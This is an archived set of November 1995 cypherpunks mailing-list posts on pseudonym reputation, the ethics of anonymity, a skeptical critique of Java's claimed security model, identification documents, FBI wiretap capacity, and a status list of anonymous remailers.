                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 6 Nov 1995 08:58:06 +0800
To: cypherpunks@toad.com
Subject: whose watchin Cypherpunks: nym question
Message-ID: <199511060047.BAA06872@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


      Stephen Whitaker-nym's resubmission ("whose watchin the watchers"
4:19 PM 11/5/95) of the very same material that I had  posted last night
suggest some questions about some aspects of nym theory. I hope the
following isn't too naive, and I apologize if it is.
      When I saw issue 183 of GovAccess, Jim Warren-nym's remarks seemed
suspect, but I didn't have a thorough enough understanding of the issues
to judge them myself -- so I decided to vet the question with the
Cypherpunks. I'm glad I did: the quick and knowledgeable responses
clarified the error, and I forwarded them to Warren-nym so that he could
correct himself promptly. The end result, as Warren rightly suggests I
think, is that a better understanding of the issues has been propagated to
his subscriber base.
      AFAIK, Warren-nym has an excellent reputation -- and that fact
certainly encouraged me to provide him with the info he would need to
correct himself quickly. OTOH, my actions garner no reputation for me --
neither for my True Name nor for nobody@REPLAY.COM. Of course, whether
such actions merit any reputational shift is debatable: I contributed no
knowledge of my own, just merely acted as a go-between. Still, the fact
that GovAccess 184 quotes my response might suggest that I beat others to
the punch; and were I able to act in such a capacity on a regular and
consistent basis, and were I to do so in a field with higher stakes, I
would surely garner a reputation. Granted, this is a lot of "woulda,
coulda" -- but it leads me to conclude that it is not the shortcomings of
my *action* that are the cause of the fact that I garner no reputational
improvement in this instance.
      Stephen Whitaker-nym's resubmission of this material, OTOH, lowers
his reputation in my eyes -- which is strange, because the only real
distinction between what he did and what I did has to do with the fact
that he sent mail to Cypherpunks without reading the Cypherpunks traffic.
So his reputational shift is purely contextual.
      So why don't I, then? Well, for starters, the nym that the Replay
remailer assigned to me is publicly accessible: anyone who uses this
remailer in the way that I did will be assigned the same quasi-nym,
nobody@REPLAY.COM. yet if, through some statistical improbability, I were
the *only* person *ever* to use this remailer in this way, and I *only*
ever used it to perform actions that would improve the reputation of a
stable nym, then the public knowledge of Replay's functionality would
neverthless serve to hinder any reputational shift that my actions had
earned: people might say, "Every message I know of that has passed through
Replay has been accurate, timely, and significant" -- but that would
improve the reputation of the Replay remailer rather than of its sole
user, myself, even though it was my actions -- *including* the use of the
Replay remailer -- that brought about this reputational shift.
      So what is a nym if not a "True Name"? I distinguish "True Name" (in
quotes) from True Name: a True Name is tied to a matrix of information
extrinsic to the entity it refers to (a SS# has no *intrinsic* relation to
the entity it designates), whereas a "True Name", though free of this info
matrix, neverthless operates according to the same logic that a True Name
does -- in terms of being tied to actions that garner reputational shifts.
The point being -- I'm probably being pretty unclear -- that if the major
distinction between a "True Name" and a True Name are links (or the lack
thereof) to arbitary and external information (and maybe the disposability
that the lack of links implies), then a lot of nym theory seems like it
pretty much reproduces True Name logic and operations. 
      Anyway, a lot of you understand this all better than I do, so I hope
to learn from any responses I receive.

Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 6 Nov 1995 19:02:52 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto++, Cpunk Icons, list noise
Message-ID: <199511061050.CAA17098@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995 don@cs.byu.edu wrote:

> An anonymous complainer writes:
> 
> >Well, Perry, my opinion is that there is far too much noise on this list 
> >as it is.  I have already seen my words drowned out by bellyaching over 
> >next to nothing.
> 
> POT-KETTLE-BLACK.
> 
> Also, since nothing you've written (in your commentary, as opposed to
> anonymous announcements or releases that most people use anonymity for
> here) indicates that you're using anonymity for any particular reason,

Hmmm, I'm not sure that anyone has an inherent right to question WHY a
person seeks moments of anonymity or privacy.  I don't believe that
anyone should be placed on the defensive, for *choosing* to maintain
some semblance of a personal life, or wishing to maintain some
illusions that they might still have some shred of personal privacy
left.  Hopefully, we can still leave a man with his dignity.

I should not have to defend my right to present my ideas as I believe
are appropriate to the circumstances.  My choice to present the idea,
that an entire economic sector needs to carefully reevaluate their
strategic choices, and their discovered hidden security attitudes -- will 
stand or fall strictly on its merits.  The debate is not advanced in any 
way by attaching a reputation to the question.

Like any other person, I have my skeletons, and I have my regrets.  I 
certainly have unfinished, unresolved, issues that I need to tend to.  In 
that sense, I am no different than any other man.  I also realize that 
ultimately, I'll have to come forward from behind the veil of secrecy 
which is provided to me.  

This I will do, after I have reconciled my own security considerations.

Please allow me the boundary and dignity to choose when, where, and in 
what form I choose to reveal myself.  That inherent right, should be
extended to any man, and no man should be called to account for his 
desire to maintain his personal privacy, no matter how arbitrary his
reasons.

Especially when he comes forward to challenge Goliath.

> please stop so people can killfile you. Or send it from a nym at
> alpha.c2.org. I mean, the NSA has your real name anyway, what's the
> point... 

At this time, I don't feel that a bi-directional private communications
channel is needed.  I have no need for a "nym".  People who need to
contact me, can.  People who would like to know a bit about me, can. 
Netscape has my address.  So does AT&T.  And reputations aren't pertinent. 

(Although, I will say, that the disappearing here-again, gone again,
internet draft at ds.internic.net is simply childish, and I'm certain that
it was just routine "file maintenance" that caused the flicker.)

The ball isn't in my court, it's in theirs.

Netscape and AT&T are some of the primary parties who will have to take
the hit for the fiasco that they find themselves in.  For now, I'll leave
my communication channels with them open, rather than letting my mail
queue fill more than it already has.  Email that is already overqueued. 
 
I don't really envy the two companies' position.  No one expects to find
as significant a security flaw as my anonymous email to this list detailed
at this stage of code Burn-In, and I don't take any pleasure in facing the
unenviable task of informing ANY party that a Trojan Horse has been
engineered into the fabric of an existing globally installed code base. 

No one does.

And as the messenger, I (hope) I don't have anything to fear, from the NSA
or any other foreign group that would seek to pursue its own agenda within
the borders of sovereign Canada.  I really don't think that the NSA is
"evil incarnate", as some list subscribers do.  They have their
intelligence and know how to use it.  Usually, they use it prudently. 

If I did have any worries about the NSA, then I might take some elementary
precautions.  I certainly wouldn't have my terminal screen pointing
towards the twelve odd feet of open glazing that sits behind me, as I
currently do. 

Privacy can't simply be reduced to "a desire to hide from the NSA", just
as security isn't something which is simply provided by licensing from
RSA. 

Look to the message rather than the messenger.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EWilhem@aol.com
Date: Mon, 6 Nov 1995 16:06:50 +0800
To: cypherpunks@toad.com
Subject: Magic Money
Message-ID: <951106025715_99002994@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Where do I get the software, Please E-mail me at roger12@cam.org. I'd like
the 
evaluation software.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 6 Nov 1995 18:17:23 +0800
To: whitaker@sover.net (Stephen Whitaker)
Subject: Re: nym-compoop
In-Reply-To: <199511060335.WAA04917@maple.sover.net>
Message-ID: <9511061002.AA10494@all.net>
MIME-Version: 1.0
Content-Type: text


> I'm glad "nobody" thinks I'm a nym for being a good eight hours:fifty-nine
> minutes out of step and having lowered my reputation in his/her eyes. Now
> I'll ask my question again, which apparantly got lost in the collective
> groan of my stale post:

You're just fine.

>         Are there ways for someone with access to modify router tables 
>         to constantly create alternate paths at other routers 
>         which would serve to end-around any such snoops?

Yes - and for other purposes as well.

...
> I can hardly find anyone who even cares about the fact that our legislature
> relies on the executive branch gov-net managers for their port/connection on
> the internet router. They also rely on the executive branch for
> troubleshooting their novell LAN. Does anyone else see a separation of
> powers issue or privacy issue here? Note that I cc: the speaker, who cares
> but doesn't yet grasp the implications. Feel free to write him directly. His
> name is Michael Obuchowski, Obe for short, <speaker@leg.state.vt.us>, tell
> him I sent you.

Is this really him, or just a secretary with electronically generated
keyword search and reply capabilities?

...
> Back to where this started:
> Eating my tasty crow gives rise to another question relating to the timing
> and continuity of these threads: How did the first responder on the RE:
> 134.222.9.1, Simon Spero, reply at 10:48 pm on Nov. 4 to Anonymous' posting
> of 7:19AM on Nov 5? Which way is this thing spinnin?

Time zone differences.  I also wish my mailer understood GMT so it would
properly sort events in time order instead of sender time of day order. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 6 Nov 1995 19:02:23 +0800
To: cypherpunks@toad.com
Subject: Java insecurity - long - argumentative - you are warned.
Message-ID: <9511061047.AA13370@all.net>
MIME-Version: 1.0
Content-Type: text


WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!

>From the Java Web pages (as combined in Firewalls/BoS):

> The language's security features (not just applets):
> 
> (http://java.sun.com/whitePaper/javawhitepaper_6.html#HEADING15)
> 
> 4.2 Security in the Java Environment
> 
> Security commands a high premium in the growing use of the Internet
> for products and services ranging from electronic distribution of
> software and multimedia content, to "digital cash". The area of
> security with which we're concerned here is how the Java compiler and
> run-time system restrict application programmers from creating
> subversive code.

But not non-subversive code?  Sounds like a value judgement to me.
Subversive code is not otherwise defined in these documents.

> The Java language compiler and run-time system implement several
> layers of defense against potentially incorrect code.

Is incorrect code subversive?  Vica versa? Does Java provide defenses
against my code not properly calculating numbers?

> One of the Java
> compiler's primary lines of defense is its memory allocation and
> reference model. Simply put, Java does not have "pointers" in the
> traditional C and C++ sense--memory cells that contain the addresses
> of other memory cells.
> 
> Memory layout decisions are not made by the compiler, as they are in C
> and C++. Rather, memory layout is deferred to run-time, and will
> potentially differ depending on the characteristics of the hardware
> and software platforms on which the Java language system is
> executing. The Java interpreter references memory via symbolic
> "handles" that are resolved to real memory addresses at run time. Java
> programmers can't forge pointers to memory, because the memory
> allocation and referencing model is completely opaque to the
> programmer and controlled entirely by the underlying run-time system.

Just because it is opaque, doesn't mean you can't happen across a valid
(but perhaps undesirable) handle.  Sounds like a good issue for attack
by crypto-types.  How do we guess the handle of the disk IO routines?

> Very late binding of structures to memory means that programmers can't
> infer the physical memory layout of a class by looking at its
> declaration. By removing the C/C++ memory layout and pointer models,
> the Java language has eliminated the programmer's ability to get
> behind the scenes and manufacture pointers to memory. These features
> must be viewed as positive benefits rather than a restriction on the
> programmer, because they ultimately lead to more reliable and secure
> applications.

Is the language un-predictable? The same program executes differently
each time? A pseudo-random allocation? What is the technique used to
implement this, and why should we believe it is in fact secure in some
sense.  And if so, in what sense?

> The Byte Code Verification Process
> 
> What about the concept of a "hostile compiler"? Although the Java
> compiler ensures that Java source code doesn't violate the safety
> rules,

What are these "safety rules"?  No reference to them in this document!

> when an application such as the HotJava web browser imports a
> code fragment from anywhere, it doesn't actually know if code
> fragments follow the Java language rules for safety--the code may not
> have been produced by a known-to-be trustworthy Java compiler. In such
> a case, how is the Java run-time system on your machine to trust the
> incoming byte code stream? The answer is simple--it doesn't trust the
> incoming code, but subjects it to byte code verification.
> 
> The tests range from simple verification that the format of a code
> fragment is correct, to passing through a simple theorem prover to
> establish that the code fragment plays by the rules--that it doesn't
> forge pointers, it doesn't violate access restrictions, and it
> accesses objects as what they are (for example, that "InputStream"
> objects are always used as "InputStreams" and never as anything
> else). A language that is safe, plus run-time verification of
> generated code, establishes a base set of guarantees that interfaces
> cannot be violated.

Wait a minute.  If it's so safe, what code can possibly be sent in that
would cause a violation? If the prover is so simple, how can it show
things (e.g., program correctness) in real-time on a PC that the rest of
the world can't show with supercomputers over extended periods? What
EXACTLY are these things doing, and why should we believe they are safe?

> The Byte Code Verifier
> 
> The last phase of the byte code loader is the verifier. It traverses
> the byte codes, constructs the type state information, and verifies
> the types of the parameters to all the byte code instructions.


> The illustration [see the HTML] shows the flow of data and control
> from Java language source code through the Java compiler, to the byte
> code verifier and hence on to the Java interpreter. The important
> issue is that the Java class loader and the byte code verifier make no
> assumptions about the primary source of the byte code stream--the code
> may have come from the local system, or it may have travelled halfway
> around the planet. The byte code verifier acts as a sort of
> gatekeeper. The byte code verifier ensures that the code passed to the
> Java interpreter is in a fit state to be executed and can run without
> fear of breaking the Java interpreter.

So there are byte code sequences that can break the interpreter!

> Imported code is not allowed to
> execute by any means until after it has passed the verifier's
> tests. Once the verifier is done, a number of important properties are
> known:
> 
>       There are no operand stack overflows or underflows

Not so easily proven, is it?

>       The types of the parameters of all byte code instructions are
> 	known to always be correct

Huh? I thought you couldn't have incorrect types.  Do they mean that you
can have incorrect types but that they are detected by the verifier at
load time?

>       No illegal data conversions are done, like converting integers
> 	to pointers

How about legal ones - like converting integers to pointers via case
statements?

>       Object field accesses are known to be legal--private or public
> 	or protected

What exactly does this mean?

> While all this checking appears excruciatingly detailed, by the time
> the byte code verifier has done its work, the Java interpreter can
> proceed knowing that the code will run securely. Knowing these
> properties makes the Java interpreter much faster, because it doesn't
> have to check anything.  There are no operand type checks and no stack
> overflow checks. The interpreter can thus function at full speed
> without compromising reliability.

Can computers actually "know" anything?

No runtime checking whatsoever.  Get past the supposed verifier, and you
have free run of the machine.  A single verifier bug or inadequacy, and
the world is unsafe for electronic commerce.  And has the Java code been
verified to prove the claimed properties?  Against what criteria?  Where's
the beef?

> Security Checks in the Class Loader
> 
> After incoming code has been vetted and determined clean by the byte
> code verifier, the next line of defense is the Java class loader. The
> environment seen by a thread of execution running Java byte codes can
> be visualized as a set of classes partitioned into separate name
> spaces. There is one name space for classes that come from the local
> file system, and a separate name space for each network source.
> 
> When a class is imported from across the network it is placed into the
> private name space associated with its origin. When a class references
> another class, it is first looked for in the name space for the local
> system (built-in classes), then in the name space of the referencing
> class.  There is no way that an imported class can "spoof" a built-in
> class. Built-in classes can never accidentally reference classes in
> imported name spaces--they can only reference such classes
> explicitly. Similarly, classes imported from different places are
> separated from each other.

But they can explicitly reference each other? I can only explicitly open
a file called command.com on your PC?

> Security in the Java Networking Package
> 
> Java's networking package provides the interfaces to handle the
> various network protocols (FTP, HTTP, Telnet, and so on). This is your
> front line of defense at the network interface level. The networking
> package can be set up with configurable levels of paranoia. You can:
> 
>       Disallow all network accesses 
> 
>       Allow all network accesses 
> 
>       Allow network accesses to only the hosts from which the code was
> 	imported
> 
>       Allow network accesses only outside the firewall if the code
> 	came from outside

Who wants to bet that 99+% of all users configure "Allow all network
accesses".  Hot Java today is defaulted to this state. 

> Applet-specific security: (written for the 1.0a3 release of
> HotJava(tm)... there will be a rewrite for the 1.0b release when that
> occurs.  I'm assuming, perhaps incorrectly, that the Netscape
> implementation is similar.  As I understand it, they licensed the HJ
> code from Sun, so I think it's all very close to the truth.)
> 
> (http://java.sun.com/1.0alpha3/doc/security/security.html)
> 
> [ A rehash of the above text, snipped ]
> 
> Security level four: protecting the file system and network access
> 
> HotJava enforces security policies confident that its security
> interfaces are secure.

In other words, it assumes the other three levels worked properly.
If they don't, you're screwed.

> The three lower levels of security guarantee
> that all local classes, e.g., the file access primitives, are
> themselves protected from being supplanted, replaced, or extended by
> imported code.

You're screwed.

> The file access primitives implement an access control list that
> controls read and write access to files by imported code (or code
> invoked by imported code). The defaults for these access control lists
> are very restrictive[*]. If an attempt is made by a piece of imported
> code to access a file to which access has not been granted, a dialog
> box pops up to allow the user to decide whether or not to allow that
> specific access. These security policies err on the conservative side
> in order to ensure maximum security. This conservative approach may
> make writing some applets more difficult or awkward.

By default - ask the user.  That's restrictive? Please press the OK
button to have our free Lotus update loaded into your computer.

> For network security, HotJava provides a variety of mechanisms that
> can provide information about the trustworthiness of imported
> code. These mechanisms cover a wide range of possibilities. At the
> simple end the system can check on the origin of a code fragment to
> determine if it came from inside or outside a firewall.  At the
> sophisticated end of the range a mechanism exists whereby public keys
> and cryptographic message digests can be securely attached to code
> fragments that not only identify who originated the code, but
> guarantee its integrity as well. This latter mechanism will be
> implemented in future releases.

So today, if the admin specifies the proper IP address ranges when
loading Java into each computer in the network, and if no user ever
installs Java on their own, "code" downloads from external machines
may be stopped - unless the user says OK.

> The security policies implemented by the runtime system can be
> dynamically adjusted based on the information available concerning the
> origin of a code fragment. The Socket class provides such an example.
> 
> The Socket class implements security policies that are adjusted to
> reflect the trustworthiness of the code that invoked it, and
> transitively, the code that invoked the invoker. The information about
> what code began the chain of execution is available to the class in
> the form of which namespace contains the invoking code and what
> parameters are associated with that class. The class loader puts the
> classes it has loaded in a specific namespace, allowing the Socket
> class to determine the network host from which a class is loaded.
> 
> Knowing the network host allows the HotJava security mechanism to
> determine whether the class originated inside or outside a
> firewall. Knowledgable users of HotJava can decide which category of
> hosts to trust when loading executable code.

How about the more than 99.99% of users who are not knowledgable of HotJava?

> For example, the Socket
> class can implement the policy of only allowing new connections to be
> created that terminate at the host from whence the code was
> loaded. This restriction means that code loaded from outside a
> firewall cannot connect to other machines on the net behind the
> firewall.

Unless that machine acts as a gateway for further processing.

> Code that comes from more trusted sources can be allowed
> more freedom to make connections to other machines. As an additional
> defense against untrusted sources HotJava's security can be set to
> prevent any code from being loaded. The level of security is
> configurable by HotJava users.

The user dictates the security policy.  Any user in your site can
potentially, through error or omission or intent, open up a hole to your
entire network by accidentally pressing the OK button one time or by
setting a configuration parameter incorrectly.  And your firewall will
not save you.

ASBESTOS SUITS MAY NOW BE REMOVED - FLAME OFF.

P.S.

When: Tuesday, November 7, 8AM
Where: The Hilton, Washington D.C. (the CSI conference)
The talk: 50 Ways to Attack Your World Wide Web Systems

If you want a chance to heckle - be there.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Mon, 6 Nov 1995 19:35:01 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: using PGP only for digital signatures
In-Reply-To: <199511060208.VAA14123@panix.com>
Message-ID: <Pine.SUN.3.91.951106061220.8722D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 5 Nov 1995, Duncan Frissell wrote:

> >> Consider this: most people in the U.S. do not have a "credential" that
> >> shows them to be U.S. citizens. (Hint: most people in the U.S. do not have
> >> passports.)
> 
> My passport is always close at hand.  I love an unchallengeable credential
> that has neither my address nor my SS# on it.  I also carry my birth
> certificate which I use for most non-driving interactions.  It doesn't have
> much useful info on it.  Secured credit cards which can be obtained in any
> name are also handy.  

I have often found and come across considerable problems using a 
passport, local or foreign, as identification.  Many estlablishments 
simply refuse to accept them, as if they are inferior somehow to the 
non-standardized frequently forged allmighty driver's license.  This is 
mostly ignorance and a lack of common reference, as few americans 
actually HAVE these documents, or have even SEEN them.  (No, I'm not 
kidding).  I found this particularly distressing in D.C.  To some degree 
it's institutional, where recording a "drivers license number" on some 
form becomes problematic for the $5.50 and hour clerk who can't find the 
field "driver's license number" anywhere on the passport.

While I just take my business elsewhere when that is possible, I think 
it's interesting to note how desperatly people cling to the social 
security number and completely inept identifications like state issued 
licenses as if to let go would mean a decent into the bleeding hell of 
anarchy.  (In its popularly assumed and feared form)


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Mon, 6 Nov 1995 23:53:58 +0800
To: jya@pipeline.com
Subject: Re:  Kallstrom Calls All Calls Tappable
Message-ID: <9511061431.AA15525@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>   James Kallstrom, assistant FBI director in charge of the
>   New York field division, argues that the proposal would in
>   fact reduce the FBI's surveillance authority. "Today ... we
>   could tap all the phones in the United States," he said,
>   referring to older, pre-digital technology. Under the plan,
>   the FBI's surveillance ability would shrink to a maximum of
>   1 percent of simultaneous telephone calls from any one
>   telephone switch, he said.

Doublespeak.  2 legs good 4 legs better.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 6 Nov 1995 19:58:37 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto++, Cpunk Icons, list noise
In-Reply-To: <199511061050.CAA17098@jobe.shell.portal.com>
Message-ID: <9511061141.AA16901@all.net>
MIME-Version: 1.0
Content-Type: text


Anonymous wrote:
> On Sat, 4 Nov 1995 don@cs.byu.edu wrote:
> 
> > An anonymous complainer writes:
> > 
> > >Well, Perry, my opinion is that there is far too much noise on this list 
> > >as it is.  I have already seen my words drowned out by bellyaching over 
> > >next to nothing.
> > 
> > POT-KETTLE-BLACK.
> > 
> > Also, since nothing you've written (in your commentary, as opposed to
> > anonymous announcements or releases that most people use anonymity for
> > here) indicates that you're using anonymity for any particular reason,
> 
> Hmmm, I'm not sure that anyone has an inherent right to question WHY a
> person seeks moments of anonymity or privacy.  I don't believe that
> anyone should be placed on the defensive, for *choosing* to maintain
> some semblance of a personal life, or wishing to maintain some
> illusions that they might still have some shred of personal privacy
> left.  Hopefully, we can still leave a man with his dignity.

In the United States, we have the right to express whatever view we
wish, so long as it doesn't endanger others (e.g., insight to riot,
scream "fire" in a crowded theater when there is no fire, etc.). 
Everyone has an inherent right to question why a person seeks moments of
anonymity or privacy. 

As far as people being placed on the defensive, if you want to be
defensive it's your choice.  In terms of understanding what you say,
without understanding the WHY, it's harder to understand and evaluate
the WHAT.

When people use the cover of anonymity to make attempts at character
assasination, they WHY certainly seems a central issue.  Is it that the
people who post such attacks are cowards? Do they have ulterior motives?
Or are they simply upset about something else in their life and taking
it out on others.  Are they using anonymity to prevent responsibility or
association? Are they afraid of retribution?  Without understanding the
motive, their postings cannot be truly understood.

> I should not have to defend my right to present my ideas as I believe
> are appropriate to the circumstances.  My choice to present the idea,
> that an entire economic sector needs to carefully reevaluate their
> strategic choices, and their discovered hidden security attitudes -- will 
> stand or fall strictly on its merits.  The debate is not advanced in any 
> way by attaching a reputation to the question.

You don't have to defend anything, but the debate is certainly advanced
by attaching reputation.  If you were an investment banker and making
major investment decisions on a daily basis without understanding the
issue, it would being a very different understanding to our reading than
if you were a high school student.  The reason is that content without
context is devoid of meaning.  The more context we have, the more
meaning we can attributed to your content. 

> Like any other person, I have my skeletons, and I have my regrets.  I 
> certainly have unfinished, unresolved, issues that I need to tend to.  In 
> that sense, I am no different than any other man.  I also realize that 
> ultimately, I'll have to come forward from behind the veil of secrecy 
> which is provided to me.  

Why wait? We have a special on truth available only today.  Tell us who
you are and we will forgive all past sins (mortal sins not included,
void where prohibited).

> This I will do, after I have reconciled my own security considerations.

Ah - probably void there.

> Please allow me the boundary and dignity to choose when, where, and in 
> what form I choose to reveal myself.  That inherent right, should be
> extended to any man, and no man should be called to account for his 
> desire to maintain his personal privacy, no matter how arbitrary his
> reasons.

Your privacy is yours, but the content of your messages continues to be
degraded by the lack of adequate context for their interpretation.

> Especially when he comes forward to challenge Goliath.

David had only a slingshot.  An anonymous remailer would have reduced
his risks too.

...

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 6 Nov 1995 23:57:18 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199511061450.GAA24989@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek reord";
$remailer{"ecafe"} = "<remail@ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo hroller syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hacktic  remailer@utopia.hacktic.nl       *********+**     8:54  99.98%
portal   hfinney@shell.portal.com         ###--###**--    46:06  99.98%
ideath   remailer@ideath.goldenbear.com   --.-----_.-- 10:46:11  99.98%
wmono    wmono@valhalla.phoenix.net       ************    12:41  99.97%
ecafe    remail@ecafe.org                 *##*#*##*#*#     1:06  99.97%
alumni   hal@alumni.caltech.edu           *+#--***+*--    46:01  99.97%
robo     robo@c2.org                      #--*##.#*#*#    10:10  99.92%
spook    remailer@valhalla.phoenix.net    * *+********    12:11  99.92%
penet    anon@anon.penet.fi               --+++-----+   3:25:44  99.90%
replay   remailer@replay.com               * ******+**     7:06  99.88%
mix      mixmaster@remail.obscura.com      ----------   1:59:30  99.75%
rmadillo remailer@armadillo.com           ++++++++++ +    39:58  99.58%
bsu-cs   nowhere@bsu-cs.bsu.edu            #-+#* *##++    13:47  99.23%
ford     remailer@bi-node.zerberus.de     ________ .   78:53:54  99.04%
syrinx   syrinx@c2.org                    __ .+-+--+++ 15:25:24  98.98%
flame    remailer@flame.alias.net          **+***+ +**    22:20  98.00%
vishnu   mixmaster@vishnu.alias.net        +*******-*+    22:47  97.99%
rahul    homer@rahul.net                  +#*****+-**+     9:18  99.95%
c2       remail@c2.org                    +-- **.*  -     46:46  86.40%
extropia remail@extropia.wimsey.com       - -..-       10:09:23  31.33%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Tue, 7 Nov 1995 01:56:41 +0800
To: cypherpunks@toad.com
Subject: Re: lp ?
Message-ID: <199511061539.HAA04245@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael Shields quoted and wrote:
> Anonymous <nobody@REPLAY.COM> wrote:
> > > -- then through the same
